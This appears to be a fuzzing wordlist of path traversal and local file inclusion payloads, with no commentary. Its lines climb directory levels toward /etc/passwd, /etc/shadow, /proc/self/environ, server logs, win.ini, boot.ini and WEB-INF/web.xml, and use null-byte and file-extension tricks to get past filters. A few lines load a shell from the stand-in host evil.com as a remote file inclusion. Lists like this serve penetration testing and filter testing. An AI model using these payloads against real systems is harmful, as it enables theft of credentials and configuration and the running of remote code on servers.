../../../../..//etc/passwd.%00
../../../../..//etc/passwd.%00.png
../../../../..//etc/passwd.asp
../../../../..//etc/passwd.bak
../../../../..//etc/passwd.conf
../../../../..//etc/passwd.html
../../../../..//etc/passwd.inc
../../../../..//etc/passwd.jsp
../../../../..//etc/passwd.log
../../../../..//etc/passwd.old
../../../../..//etc/passwd.php
../../../../..//etc/passwd.txt
../../../../..//etc/shadow
../../../../..//etc/shadow%00
../../../../..//etc/shadow.%00
../../../../..//etc/shadow.%00.png
../../../../..//etc/shadow.asp
../../../../..//etc/shadow.bak
../../../../..//etc/shadow.conf
../../../../..//etc/shadow.html
../../../../..//etc/shadow.inc
../../../../..//etc/shadow.jsp
../../../../..//etc/shadow.log
../../../../..//etc/shadow.old
../../../../..//etc/shadow.php
../../../../..//etc/shadow.txt
../../../../..//proc/self/environ
../../../../..//proc/self/environ%00
../../../../..//proc/self/environ.%00
../../../../..//proc/self/environ.%00.png
../../../../..//proc/self/environ.asp
../../../../..//proc/self/environ.bak
../../../../..//proc/self/environ.conf
../../../../..//proc/self/environ.html
../../../../..//proc/self/environ.inc
../../../../..//proc/self/environ.jsp
../../../../..//proc/self/environ.log
../../../../..//proc/self/environ.old
../../../../..//proc/self/environ.php
../../../../..//proc/self/environ.txt
../../../../..//var/log/auth.log
../../../../..//var/log/auth.log%00
../../../../..//var/log/auth.log.%00
../../../../..//var/log/auth.log.%00.png
../../../../..//var/log/auth.log.asp
../../../../..//var/log/auth.log.bak
../../../../..//var/log/auth.log.conf
../../../../..//var/log/auth.log.html
../../../../..//var/log/auth.log.inc
../../../../..//var/log/auth.log.jsp
../../../../..//var/log/auth.log.log
../../../../..//var/log/auth.log.old
../../../../..//var/log/auth.log.php
../../../../..//var/log/auth.log.txt
../../../../..//var/log/nginx/access.log
../../../../..//var/log/nginx/access.log%00
../../../../..//var/log/nginx/access.log.%00
../../../../..//var/log/nginx/access.log.%00.png
../../../../..//var/log/nginx/access.log.asp
../../../../..//var/log/nginx/access.log.bak
../../../../..//var/log/nginx/access.log.conf
../../../../..//var/log/nginx/access.log.html
../../../../..//var/log/nginx/access.log.inc
../../../../..//var/log/nginx/access.log.jsp
../../../../..//var/log/nginx/access.log.log
../../../../..//var/log/nginx/access.log.old
../../../../..//var/log/nginx/access.log.php
../../../../..//var/log/nginx/access.log.txt
../../../../..//windows/win.ini
../../../../..//windows/win.ini%00
../../../../..//windows/win.ini.%00
../../../../..//windows/win.ini.%00.png
../../../../..//windows/win.ini.asp
../../../../..//windows/win.ini.bak
../../../../..//windows/win.ini.conf
../../../../..//windows/win.ini.html
../../../../..//windows/win.ini.inc
../../../../..//windows/win.ini.jsp
../../../../..//windows/win.ini.log
../../../../..//windows/win.ini.old
../../../../..//windows/win.ini.php
../../../../..//windows/win.ini.txt
../../../..//WEB-INF/web.xml
../../../..//WEB-INF/web.xml%00
../../../..//WEB-INF/web.xml.%00
../../../..//WEB-INF/web.xml.%00.png
../../../..//WEB-INF/web.xml.asp
../../../..//WEB-INF/web.xml.bak
../../../..//WEB-INF/web.xml.conf
../../../..//WEB-INF/web.xml.html
../../../..//WEB-INF/web.xml.inc
../../../..//WEB-INF/web.xml.jsp
../../../..//WEB-INF/web.xml.log
../../../..//WEB-INF/web.xml.old
../../../..//WEB-INF/web.xml.php
../../../..//WEB-INF/web.xml.txt
../../../..//boot.ini
../../../..//boot.ini%00
../../../..//boot.ini.%00
../../../..//boot.ini.%00.png
../../../..//boot.ini.asp
../../../..//boot.ini.bak
../../../..//boot.ini.conf
../../../..//boot.ini.html
../../../..//boot.ini.inc
../../../..//boot.ini.jsp
../../../..//boot.ini.log
../../../..//boot.ini.old
../../../..//boot.ini.php
../../../..//boot.ini.txt
../../../..//etc/hostname
../../../..//etc/hostname%00
../../../..//etc/hostname.%00
../../../..//etc/hostname.%00.png
../../../..//etc/hostname.asp
../../../..//etc/hostname.bak
../../../..//etc/hostname.conf
../../../..//etc/hostname.html
../../../..//etc/hostname.inc
../../../..//etc/hostname.jsp
../../../..//etc/hostname.log
../../../..//etc/hostname.old
../../../..//etc/hostname.php
../../../..//etc/hostname.txt
../../../..//etc/hosts
../../../..//etc/hosts%00
../../../..//etc/hosts.%00
../../../..//etc/hosts.%00.png
../../../..//etc/hosts.asp
../../../..//etc/hosts.bak
../../../..//etc/hosts.conf
../../../..//etc/hosts.html
../../../..//etc/hosts.inc
../../../..//etc/hosts.jsp
../../../..//etc/hosts.log
../../../..//etc/hosts.old
../../../..//etc/hosts.php
../../../..//etc/hosts.txt
../../../..//etc/passwd
../../../..//etc/passwd%00
../../../..//etc/passwd.%00
../../../..//etc/passwd.%00.png
../../../..//etc/passwd.asp
../../../..//etc/passwd.bak
../../../..//etc/passwd.conf
../../../..//etc/passwd.html
../../../..//etc/passwd.inc
../../../..//etc/passwd.jsp
../../../..//etc/passwd.log
../../../..//etc/passwd.old
../../../..//etc/passwd.php
../../../..//etc/passwd.txt
../../../..//etc/shadow
../../../..//etc/shadow%00
../../../..//etc/shadow.%00
../../../..//etc/shadow.%00.png
../../../..//etc/shadow.asp
../../../..//etc/shadow.bak
../../../..//etc/shadow.conf
../../../..//etc/shadow.html
../../../..//etc/shadow.inc
../../../..//etc/shadow.jsp
../../../..//etc/shadow.log
../../../..//etc/shadow.old
../../../..//etc/shadow.php
../../../..//etc/shadow.txt
../../../..//proc/self/environ
../../../..//proc/self/environ%00
../../../..//proc/self/environ.%00
../../../..//proc/self/environ.%00.png
../../../..//proc/self/environ.asp
../../../..//proc/self/environ.bak
../../../..//proc/self/environ.conf
../../../..//proc/self/environ.html
../../../..//proc/self/environ.inc
../../../..//proc/self/environ.jsp
../../../..//proc/self/environ.log
../../../..//proc/self/environ.old
../../../..//proc/self/environ.php
../../../..//proc/self/environ.txt
../../../..//var/log/auth.log
../../../..//var/log/auth.log%00
../../../..//var/log/auth.log.%00
../../../..//var/log/auth.log.%00.png
../../../..//var/log/auth.log.asp
../../../..//var/log/auth.log.bak
../../../..//var/log/auth.log.conf
../../../..//var/log/auth.log.html
../../../..//var/log/auth.log.inc
../../../..//var/log/auth.log.jsp
../../../..//var/log/auth.log.log
../../../..//var/log/auth.log.old
../../../..//var/log/auth.log.php
../../../..//var/log/auth.log.txt
../../../..//var/log/nginx/access.log
../../../..//var/log/nginx/access.log%00
../../../..//var/log/nginx/access.log.%00
../../../..//var/log/nginx/access.log.%00.png
../../../..//var/log/nginx/access.log.asp
../../../..//var/log/nginx/access.log.bak
../../../..//var/log/nginx/access.log.conf
../../../..//var/log/nginx/access.log.html
../../../..//var/log/nginx/access.log.inc
../../../..//var/log/nginx/access.log.jsp
../../../..//var/log/nginx/access.log.log
../../../..//var/log/nginx/access.log.old
../../../..//var/log/nginx/access.log.php
../../../..//var/log/nginx/access.log.txt
../../../..//windows/win.ini
../../../..//windows/win.ini%00
../../../..//windows/win.ini.%00
../../../..//windows/win.ini.%00.png
../../../..//windows/win.ini.asp
../../../..//windows/win.ini.bak
../../../..//windows/win.ini.conf
../../../..//windows/win.ini.html
../../../..//windows/win.ini.inc
../../../..//windows/win.ini.jsp
../../../..//windows/win.ini.log
../../../..//windows/win.ini.old
../../../..//windows/win.ini.php
../../../..//windows/win.ini.txt
../../..//WEB-INF/web.xml
../../..//WEB-INF/web.xml%00
../../..//WEB-INF/web.xml.%00
../../..//WEB-INF/web.xml.%00.png
../../..//WEB-INF/web.xml.asp
../../..//WEB-INF/web.xml.bak
../../..//WEB-INF/web.xml.conf
../../..//WEB-INF/web.xml.html
../../..//WEB-INF/web.xml.inc
../../..//WEB-INF/web.xml.jsp
../../..//WEB-INF/web.xml.log
../../..//WEB-INF/web.xml.old
../../..//WEB-INF/web.xml.php
../../..//WEB-INF/web.xml.txt
../../..//boot.ini
../../..//boot.ini%00
../../..//boot.ini.%00
../../..//boot.ini.%00.png
../../..//boot.ini.asp
../../..//boot.ini.bak
../../..//boot.ini.conf
../../..//boot.ini.html
../../..//boot.ini.inc
../../..//boot.ini.jsp
../../..//boot.ini.log
../../..//boot.ini.old
../../..//boot.ini.php
../../..//boot.ini.txt
../../..//etc/hostname
../../..//etc/hostname%00
../../..//etc/hostname.%00
../../..//etc/hostname.%00.png
../../..//etc/hostname.asp
../../..//etc/hostname.bak
../../..//etc/hostname.conf
../../..//etc/hostname.html
../../..//etc/hostname.inc
../../..//etc/hostname.jsp
../../..//etc/hostname.log
../../..//etc/hostname.old
../../..//etc/hostname.php
../../..//etc/hostname.txt
../../..//etc/hosts
../../..//etc/hosts%00
../../..//etc/hosts.%00
../../..//etc/hosts.%00.png
../../..//etc/hosts.asp
../../..//etc/hosts.bak
../../..//etc/hosts.conf
../../..//etc/hosts.html
../../..//etc/hosts.inc
../../..//etc/hosts.jsp
../../..//etc/hosts.log
../../..//etc/hosts.old
../../..//etc/hosts.php
../../..//etc/hosts.txt
../../..//etc/passwd
../../..//etc/passwd%00
../../..//etc/passwd.%00
../../..//etc/passwd.%00.png
../../..//etc/passwd.asp
../../..//etc/passwd.bak
../../..//etc/passwd.conf
../../..//etc/passwd.html
../../..//etc/passwd.inc
../../..//etc/passwd.jsp
../../..//etc/passwd.log
../../..//etc/passwd.old
../../..//etc/passwd.php
../../..//etc/passwd.txt
../../..//etc/shadow
../../..//etc/shadow%00
../../..//etc/shadow.%00
../../..//etc/shadow.%00.png
../../..//etc/shadow.asp
../../..//etc/shadow.bak
../../..//etc/shadow.conf
../../..//etc/shadow.html
../../..//etc/shadow.inc
../../..//etc/shadow.jsp
../../..//etc/shadow.log
../../..//etc/shadow.old
../../..//etc/shadow.php
../../..//etc/shadow.txt
../../..//proc/self/environ
../../..//proc/self/environ%00
../../..//proc/self/environ.%00
../../..//proc/self/environ.%00.png
../../..//proc/self/environ.asp
../../..//proc/self/environ.bak
../../..//proc/self/environ.conf
../../..//proc/self/environ.html
../../..//proc/self/environ.inc
../../..//proc/self/environ.jsp
../../..//proc/self/environ.log
../../..//proc/self/environ.old
../../..//proc/self/environ.php
../../..//proc/self/environ.txt
../../..//var/log/auth.log
../../..//var/log/auth.log%00
../../..//var/log/auth.log.%00
../../..//var/log/auth.log.%00.png
../../..//var/log/auth.log.asp
../../..//var/log/auth.log.bak
../../..//var/log/auth.log.conf
../../..//var/log/auth.log.html
../../..//var/log/auth.log.inc
../../..//var/log/auth.log.jsp
../../..//var/log/auth.log.log
../../..//var/log/auth.log.old
../../..//var/log/auth.log.php
../../..//var/log/auth.log.txt
../../..//var/log/nginx/access.log
../../..//var/log/nginx/access.log%00
../../..//var/log/nginx/access.log.%00
../../..//var/log/nginx/access.log.%00.png
../../..//var/log/nginx/access.log.asp
../../..//var/log/nginx/access.log.bak
../../..//var/log/nginx/access.log.conf
../../..//var/log/nginx/access.log.html
../../..//var/log/nginx/access.log.inc
../../..//var/log/nginx/access.log.jsp
../../..//var/log/nginx/access.log.log
../../..//var/log/nginx/access.log.old
../../..//var/log/nginx/access.log.php
../../..//var/log/nginx/access.log.txt
../../..//windows/win.ini
../../..//windows/win.ini%00
../../..//windows/win.ini.%00
../../..//windows/win.ini.%00.png
../../..//windows/win.ini.asp
../../..//windows/win.ini.bak
../../..//windows/win.ini.conf
../../..//windows/win.ini.html
../../..//windows/win.ini.inc
../../..//windows/win.ini.jsp
../../..//windows/win.ini.log
../../..//windows/win.ini.old
../../..//windows/win.ini.php
../../..//windows/win.ini.txt
../..//WEB-INF/web.xml
../..//WEB-INF/web.xml%00
../..//WEB-INF/web.xml.%00
../..//WEB-INF/web.xml.%00.png
../..//WEB-INF/web.xml.asp
../..//WEB-INF/web.xml.bak
../..//WEB-INF/web.xml.conf
../..//WEB-INF/web.xml.html
../..//WEB-INF/web.xml.inc
../..//WEB-INF/web.xml.jsp
../..//WEB-INF/web.xml.log
../..//WEB-INF/web.xml.old
../..//WEB-INF/web.xml.php
../..//WEB-INF/web.xml.txt
../..//boot.ini
../..//boot.ini%00
../..//boot.ini.%00
../..//boot.ini.%00.png
../..//boot.ini.asp
../..//boot.ini.bak
../..//boot.ini.conf
../..//boot.ini.html
../..//boot.ini.inc
../..//boot.ini.jsp
../..//boot.ini.log
../..//boot.ini.old
../..//boot.ini.php
../..//boot.ini.txt
../..//etc/hostname
../..//etc/hostname%00
../..//etc/hostname.%00
../..//etc/hostname.%00.png
../..//etc/hostname.asp
../..//etc/hostname.bak
../..//etc/hostname.conf
../..//etc/hostname.html
../..//etc/hostname.inc
../..//etc/hostname.jsp
../..//etc/hostname.log
../..//etc/hostname.old
../..//etc/hostname.php
../..//etc/hostname.txt
../..//etc/hosts
../..//etc/hosts%00
../..//etc/hosts.%00
../..//etc/hosts.%00.png
../..//etc/hosts.asp
../..//etc/hosts.bak
../..//etc/hosts.conf
../..//etc/hosts.html
../..//etc/hosts.inc
../..//etc/hosts.jsp
../..//etc/hosts.log
../..//etc/hosts.old
../..//etc/hosts.php
../..//etc/hosts.txt
../..//etc/passwd
../..//etc/passwd%00
../..//etc/passwd.%00
../..//etc/passwd.%00.png
../..//etc/passwd.asp
../..//etc/passwd.bak
../..//etc/passwd.conf
../..//etc/passwd.html
../..//etc/passwd.inc
../..//etc/passwd.jsp
../..//etc/passwd.log
../..//etc/passwd.old
../..//etc/passwd.php
../..//etc/passwd.txt
../..//etc/shadow
../..//etc/shadow%00
../..//etc/shadow.%00
../..//etc/shadow.%00.png
../..//etc/shadow.asp
../..//etc/shadow.bak
../..//etc/shadow.conf
../..//etc/shadow.html
../..//etc/shadow.inc
../..//etc/shadow.jsp
../..//etc/shadow.log
../..//etc/shadow.old
../..//etc/shadow.php
../..//etc/shadow.txt
../..//proc/self/environ
../..//proc/self/environ%00
../..//proc/self/environ.%00
../..//proc/self/environ.%00.png
../..//proc/self/environ.asp
../..//proc/self/environ.bak
../..//proc/self/environ.conf
../..//proc/self/environ.html
../..//proc/self/environ.inc
../..//proc/self/environ.jsp
../..//proc/self/environ.log
../..//proc/self/environ.old
../..//proc/self/environ.php
../..//proc/self/environ.txt
../..//var/log/auth.log
../..//var/log/auth.log%00
../..//var/log/auth.log.%00
../..//var/log/auth.log.%00.png
../..//var/log/auth.log.asp
../..//var/log/auth.log.bak
../..//var/log/auth.log.conf
../..//var/log/auth.log.html
../..//var/log/auth.log.inc
../..//var/log/auth.log.jsp
../..//var/log/auth.log.log
../..//var/log/auth.log.old
../..//var/log/auth.log.php
../..//var/log/auth.log.txt
../..//var/log/nginx/access.log
../..//var/log/nginx/access.log%00
../..//var/log/nginx/access.log.%00
../..//var/log/nginx/access.log.%00.png
../..//var/log/nginx/access.log.asp
../..//var/log/nginx/access.log.bak
../..//var/log/nginx/access.log.conf
../..//var/log/nginx/access.log.html
../..//var/log/nginx/access.log.inc
../..//var/log/nginx/access.log.jsp
../..//var/log/nginx/access.log.log
../..//var/log/nginx/access.log.old
../..//var/log/nginx/access.log.php
../..//var/log/nginx/access.log.txt
../..//windows/win.ini
../..//windows/win.ini%00
../..//windows/win.ini.%00
../..//windows/win.ini.%00.png
../..//windows/win.ini.asp
../..//windows/win.ini.bak
../..//windows/win.ini.conf
../..//windows/win.ini.html
../..//windows/win.ini.inc
../..//windows/win.ini.jsp
../..//windows/win.ini.log
../..//windows/win.ini.old
../..//windows/win.ini.php
../..//windows/win.ini.txt
..//WEB-INF/web.xml
..//WEB-INF/web.xml%00
..//WEB-INF/web.xml.%00
..//WEB-INF/web.xml.%00.png
..//WEB-INF/web.xml.asp
..//WEB-INF/web.xml.bak
..//WEB-INF/web.xml.conf
..//WEB-INF/web.xml.html
..//WEB-INF/web.xml.inc
..//WEB-INF/web.xml.jsp
..//WEB-INF/web.xml.log
..//WEB-INF/web.xml.old
..//WEB-INF/web.xml.php
..//WEB-INF/web.xml.txt
..//boot.ini
..//boot.ini%00
..//boot.ini.%00
..//boot.ini.%00.png
..//boot.ini.asp
..//boot.ini.bak
..//boot.ini.conf
..//boot.ini.html
..//boot.ini.inc
..//boot.ini.jsp
..//boot.ini.log
..//boot.ini.old
..//boot.ini.php
..//boot.ini.txt
..//etc/hostname
..//etc/hostname%00
..//etc/hostname.%00
..//etc/hostname.%00.png
..//etc/hostname.asp
..//etc/hostname.bak
..//etc/hostname.conf
..//etc/hostname.html
..//etc/hostname.inc
..//etc/hostname.jsp
..//etc/hostname.log
..//etc/hostname.old
..//etc/hostname.php
..//etc/hostname.txt
..//etc/hosts
..//etc/hosts%00
..//etc/hosts.%00
..//etc/hosts.%00.png
..//etc/hosts.asp
..//etc/hosts.bak
..//etc/hosts.conf
..//etc/hosts.html
..//etc/hosts.inc
..//etc/hosts.jsp
..//etc/hosts.log
..//etc/hosts.old
..//etc/hosts.php
..//etc/hosts.txt
..//etc/passwd
..//etc/passwd%00
..//etc/passwd.%00
..//etc/passwd.%00.png
..//etc/passwd.asp
..//etc/passwd.bak
..//etc/passwd.conf
..//etc/passwd.html
..//etc/passwd.inc
..//etc/passwd.jsp
..//etc/passwd.log
..//etc/passwd.old
..//etc/passwd.php
..//etc/passwd.txt
..//etc/shadow
..//etc/shadow%00
..//etc/shadow.%00
..//etc/shadow.%00.png
..//etc/shadow.asp
..//etc/shadow.bak
..//etc/shadow.conf
..//etc/shadow.html
..//etc/shadow.inc
..//etc/shadow.jsp
..//etc/shadow.log
..//etc/shadow.old
..//etc/shadow.php
..//etc/shadow.txt
..//proc/self/environ
..//proc/self/environ%00
..//proc/self/environ.%00
..//proc/self/environ.%00.png
..//proc/self/environ.asp
..//proc/self/environ.bak
..//proc/self/environ.conf
..//proc/self/environ.html
..//proc/self/environ.inc
..//proc/self/environ.jsp
..//proc/self/environ.log
..//proc/self/environ.old
..//proc/self/environ.php
..//proc/self/environ.txt
..//var/log/auth.log
..//var/log/auth.log%00
..//var/log/auth.log.%00
..//var/log/auth.log.%00.png
..//var/log/auth.log.asp
..//var/log/auth.log.bak
..//var/log/auth.log.conf
..//var/log/auth.log.html
..//var/log/auth.log.inc
..//var/log/auth.log.jsp
..//var/log/auth.log.log
..//var/log/auth.log.old
..//var/log/auth.log.php
..//var/log/auth.log.txt
..//var/log/nginx/access.log
..//var/log/nginx/access.log%00
..//var/log/nginx/access.log.%00
..//var/log/nginx/access.log.%00.png
..//var/log/nginx/access.log.asp
..//var/log/nginx/access.log.bak
..//var/log/nginx/access.log.conf
..//var/log/nginx/access.log.html
..//var/log/nginx/access.log.inc
..//var/log/nginx/access.log.jsp
..//var/log/nginx/access.log.log
..//var/log/nginx/access.log.old
..//var/log/nginx/access.log.php
..//var/log/nginx/access.log.txt
..//windows/win.ini
..//windows/win.ini%00
..//windows/win.ini.%00
..//windows/win.ini.%00.png
..//windows/win.ini.asp
..//windows/win.ini.bak
..//windows/win.ini.conf
..//windows/win.ini.html
..//windows/win.ini.inc
..//windows/win.ini.jsp
..//windows/win.ini.log
..//windows/win.ini.old
..//windows/win.ini.php
..//windows/win.ini.txt
../WEB-INF/web.xml
../WEB-INF/web.xml%00
../WEB-INF/web.xml.%00
../WEB-INF/web.xml.%00.png
../WEB-INF/web.xml.asp
../WEB-INF/web.xml.bak
../WEB-INF/web.xml.conf
../WEB-INF/web.xml.html
../WEB-INF/web.xml.inc
../WEB-INF/web.xml.jsp
../WEB-INF/web.xml.log
../WEB-INF/web.xml.old
../WEB-INF/web.xml.php
../WEB-INF/web.xml.txt
../boot.ini
../boot.ini%00
../boot.ini.%00
../boot.ini.%00.png
../boot.ini.asp
../boot.ini.bak
../boot.ini.conf
../boot.ini.html
../boot.ini.inc
../boot.ini.jsp
../boot.ini.log
../boot.ini.old
../boot.ini.php
../boot.ini.txt
../etc/hostname
../etc/hostname%00
../etc/hostname.%00
../etc/hostname.%00.png
../etc/hostname.asp
../etc/hostname.bak
../etc/hostname.conf
../etc/hostname.html
../etc/hostname.inc
../etc/hostname.jsp
../etc/hostname.log
../etc/hostname.old
../etc/hostname.php
../etc/hostname.txt
../etc/hosts
../etc/hosts%00
../etc/hosts.%00
../etc/hosts.%00.png
../etc/hosts.asp
../etc/hosts.bak
../etc/hosts.conf
../etc/hosts.html
../etc/hosts.inc
../etc/hosts.jsp
../etc/hosts.log
../etc/hosts.old
../etc/hosts.php
../etc/hosts.txt
../etc/passwd
../etc/passwd%00
../etc/passwd.%00
../etc/passwd.%00.png
../etc/passwd.asp
../etc/passwd.bak
../etc/passwd.conf
../etc/passwd.html
../etc/passwd.inc
../etc/passwd.jsp
../etc/passwd.log
../etc/passwd.old
../etc/passwd.php
../etc/passwd.txt
../etc/shadow
../etc/shadow%00
../etc/shadow.%00
../etc/shadow.%00.png
../etc/shadow.asp
../etc/shadow.bak
../etc/shadow.conf
../etc/shadow.html
../etc/shadow.inc
../etc/shadow.jsp
../etc/shadow.log
../etc/shadow.old
../etc/shadow.php
../etc/shadow.txt
../proc/self/environ
../proc/self/environ%00
../proc/self/environ.%00
../proc/self/environ.%00.png
../proc/self/environ.asp
../proc/self/environ.bak
../proc/self/environ.conf
../proc/self/environ.html
../proc/self/environ.inc
../proc/self/environ.jsp
../proc/self/environ.log
../proc/self/environ.old
../proc/self/environ.php
../proc/self/environ.txt
../var/log/auth.log
../var/log/auth.log%00
../var/log/auth.log.%00
../var/log/auth.log.%00.png
../var/log/auth.log.asp
../var/log/auth.log.bak
../var/log/auth.log.conf
../var/log/auth.log.html
../var/log/auth.log.inc
../var/log/auth.log.jsp
../var/log/auth.log.log
../var/log/auth.log.old
../var/log/auth.log.php
../var/log/auth.log.txt
../var/log/nginx/access.log
../var/log/nginx/access.log%00
../var/log/nginx/access.log.%00
../var/log/nginx/access.log.%00.png
../var/log/nginx/access.log.asp
../var/log/nginx/access.log.bak
../var/log/nginx/access.log.conf
../var/log/nginx/access.log.html
../var/log/nginx/access.log.inc
../var/log/nginx/access.log.jsp
../var/log/nginx/access.log.log
../var/log/nginx/access.log.old
../var/log/nginx/access.log.php
../var/log/nginx/access.log.txt
../windows/win.ini
../windows/win.ini%00
../windows/win.ini.%00
../windows/win.ini.%00.png
../windows/win.ini.asp
../windows/win.ini.bak
../windows/win.ini.conf
../windows/win.ini.html
../windows/win.ini.inc
../windows/win.ini.jsp
../windows/win.ini.log
../windows/win.ini.old
../windows/win.ini.php
../windows/win.ini.txt
.//WEB-INF/web.xml
.//WEB-INF/web.xml%00
.//WEB-INF/web.xml.%00
.//WEB-INF/web.xml.%00.png
.//WEB-INF/web.xml.asp
.//WEB-INF/web.xml.bak
.//WEB-INF/web.xml.conf
.//WEB-INF/web.xml.html
.//WEB-INF/web.xml.inc
.//WEB-INF/web.xml.jsp
.//WEB-INF/web.xml.log
.//WEB-INF/web.xml.old
.//WEB-INF/web.xml.php
.//WEB-INF/web.xml.txt
.//boot.ini
.//boot.ini%00
.//boot.ini.%00
.//boot.ini.%00.png
.//boot.ini.asp
.//boot.ini.bak
.//boot.ini.conf
.//boot.ini.html
.//boot.ini.inc
.//boot.ini.jsp
.//boot.ini.log
.//boot.ini.old
.//boot.ini.php
.//boot.ini.txt
.//etc/hostname
.//etc/hostname%00
.//etc/hostname.%00
.//etc/hostname.%00.png
.//etc/hostname.asp
.//etc/hostname.bak
.//etc/hostname.conf
.//etc/hostname.html
.//etc/hostname.inc
.//etc/hostname.jsp
.//etc/hostname.log
.//etc/hostname.old
.//etc/hostname.php
.//etc/hostname.txt
.//etc/hosts
.//etc/hosts%00
.//etc/hosts.%00
.//etc/hosts.%00.png
.//etc/hosts.asp
.//etc/hosts.bak
.//etc/hosts.conf
.//etc/hosts.html
.//etc/hosts.inc
.//etc/hosts.jsp
.//etc/hosts.log
.//etc/hosts.old
.//etc/hosts.php
.//etc/hosts.txt
.//etc/passwd
.//etc/passwd%00
.//etc/passwd.%00
.//etc/passwd.%00.png
.//etc/passwd.asp
.//etc/passwd.bak
.//etc/passwd.conf
.//etc/passwd.html
.//etc/passwd.inc
.//etc/passwd.jsp
.//etc/passwd.log
.//etc/passwd.old
.//etc/passwd.php
.//etc/passwd.txt
.//etc/shadow
.//etc/shadow%00
.//etc/shadow.%00
.//etc/shadow.%00.png
.//etc/shadow.asp
.//etc/shadow.bak
.//etc/shadow.conf
.//etc/shadow.html
.//etc/shadow.inc
.//etc/shadow.jsp
.//etc/shadow.log
.//etc/shadow.old
.//etc/shadow.php
.//etc/shadow.txt
.//proc/self/environ
.//proc/self/environ%00
.//proc/self/environ.%00
.//proc/self/environ.%00.png
.//proc/self/environ.asp
.//proc/self/environ.bak
.//proc/self/environ.conf
.//proc/self/environ.html
.//proc/self/environ.inc
.//proc/self/environ.jsp
.//proc/self/environ.log
.//proc/self/environ.old
.//proc/self/environ.php
.//proc/self/environ.txt
.//var/log/auth.log
.//var/log/auth.log%00
.//var/log/auth.log.%00
.//var/log/auth.log.%00.png
.//var/log/auth.log.asp
.//var/log/auth.log.bak
.//var/log/auth.log.conf
.//var/log/auth.log.html
.//var/log/auth.log.inc
.//var/log/auth.log.jsp
.//var/log/auth.log.log
.//var/log/auth.log.old
.//var/log/auth.log.php
.//var/log/auth.log.txt
.//var/log/nginx/access.log
.//var/log/nginx/access.log%00
.//var/log/nginx/access.log.%00
.//var/log/nginx/access.log.%00.png
.//var/log/nginx/access.log.asp
.//var/log/nginx/access.log.bak
.//var/log/nginx/access.log.conf
.//var/log/nginx/access.log.html
.//var/log/nginx/access.log.inc
.//var/log/nginx/access.log.jsp
.//var/log/nginx/access.log.log
.//var/log/nginx/access.log.old
.//var/log/nginx/access.log.php
.//var/log/nginx/access.log.txt
.//windows/win.ini
.//windows/win.ini%00
.//windows/win.ini.%00
.//windows/win.ini.%00.png
.//windows/win.ini.asp
.//windows/win.ini.bak
.//windows/win.ini.conf
.//windows/win.ini.html
.//windows/win.ini.inc
.//windows/win.ini.jsp
.//windows/win.ini.log
.//windows/win.ini.old
.//windows/win.ini.php
.//windows/win.ini.txt
//WEB-INF/web.xml
//WEB-INF/web.xml%00
//WEB-INF/web.xml.%00
//WEB-INF/web.xml.%00.png
//WEB-INF/web.xml.asp
//WEB-INF/web.xml.bak
//WEB-INF/web.xml.conf
//WEB-INF/web.xml.html
//WEB-INF/web.xml.inc
//WEB-INF/web.xml.jsp
//WEB-INF/web.xml.log
//WEB-INF/web.xml.old
//WEB-INF/web.xml.php
//WEB-INF/web.xml.txt
//boot.ini
//boot.ini%00
//boot.ini.%00
//boot.ini.%00.png
//boot.ini.asp
//boot.ini.bak
//boot.ini.conf
//boot.ini.html
//boot.ini.inc
//boot.ini.jsp
//boot.ini.log
//boot.ini.old
//boot.ini.php
//boot.ini.txt
//etc/hostname
//etc/hostname%00
//etc/hostname.%00
//etc/hostname.%00.png
//etc/hostname.asp
//etc/hostname.bak
//etc/hostname.conf
//etc/hostname.html
//etc/hostname.inc
//etc/hostname.jsp
//etc/hostname.log
//etc/hostname.old
//etc/hostname.php
//etc/hostname.txt
//etc/hosts
//etc/hosts%00
//etc/hosts.%00
//etc/hosts.%00.png
//etc/hosts.asp
//etc/hosts.bak
//etc/hosts.conf
//etc/hosts.html
//etc/hosts.inc
//etc/hosts.jsp
//etc/hosts.log
//etc/hosts.old
//etc/hosts.php
//etc/hosts.txt
//etc/passwd
//etc/passwd%00
//etc/passwd.%00
//etc/passwd.%00.png
//etc/passwd.asp
//etc/passwd.bak
//etc/passwd.conf
//etc/passwd.html
//etc/passwd.inc
//etc/passwd.jsp
//etc/passwd.log
//etc/passwd.old
//etc/passwd.php
//etc/passwd.txt
//etc/shadow
//etc/shadow%00
//etc/shadow.%00
//etc/shadow.%00.png
//etc/shadow.asp
//etc/shadow.bak
//etc/shadow.conf
//etc/shadow.html
//etc/shadow.inc
//etc/shadow.jsp
//etc/shadow.log
//etc/shadow.old
//etc/shadow.php
//etc/shadow.txt
//evil.com/shell.txt
//evil.com/shell.txt#
//evil.com/shell.txt%00
//evil.com/shell.txt//
//evil.com/shell.txt?
//proc/self/environ
//proc/self/environ%00
//proc/self/environ.%00
//proc/self/environ.%00.png
//proc/self/environ.asp
//proc/self/environ.bak
//proc/self/environ.conf
//proc/self/environ.html
//proc/self/environ.inc
//proc/self/environ.jsp
//proc/self/environ.log
//proc/self/environ.old
//proc/self/environ.php
//proc/self/environ.txt
//var/log/auth.log
//var/log/auth.log%00
//var/log/auth.log.%00
//var/log/auth.log.%00.png
//var/log/auth.log.asp
//var/log/auth.log.bak
//var/log/auth.log.conf
//var/log/auth.log.html
//var/log/auth.log.inc
//var/log/auth.log.jsp
//var/log/auth.log.log
//var/log/auth.log.old
//var/log/auth.log.php
//var/log/auth.log.txt
//var/log/nginx/access.log
//var/log/nginx/access.log%00
//var/log/nginx/access.log.%00
//var/log/nginx/access.log.%00.png
//var/log/nginx/access.log.asp
//var/log/nginx/access.log.bak
//var/log/nginx/access.log.conf
//var/log/nginx/access.log.html
//var/log/nginx/access.log.inc
//var/log/nginx/access.log.jsp
//var/log/nginx/access.log.log
//var/log/nginx/access.log.old
//var/log/nginx/access.log.php
//var/log/nginx/access.log.txt
//windows/win.ini
//windows/win.ini%00
//windows/win.ini.%00
//windows/win.ini.%00.png
//windows/win.ini.asp
//windows/win.ini.bak
//windows/win.ini.conf
//windows/win.ini.html
//windows/win.ini.inc
//windows/win.ini.jsp
//windows/win.ini.log
//windows/win.ini.old
//windows/win.ini.php
//windows/win.ini.txt
/WEB-INF/web.xml
/WEB-INF/web.xml%00
/WEB-INF/web.xml.%00
/WEB-INF/web.xml.%00.png
/WEB-INF/web.xml.asp
/WEB-INF/web.xml.bak
/WEB-INF/web.xml.conf
/WEB-INF/web.xml.html
/WEB-INF/web.xml.inc
/WEB-INF/web.xml.jsp
/WEB-INF/web.xml.log
/WEB-INF/web.xml.old
/WEB-INF/web.xml.php
/WEB-INF/web.xml.txt
/boot.ini
/boot.ini%00
/boot.ini.%00
/boot.ini.%00.png
/boot.ini.asp
/boot.ini.bak
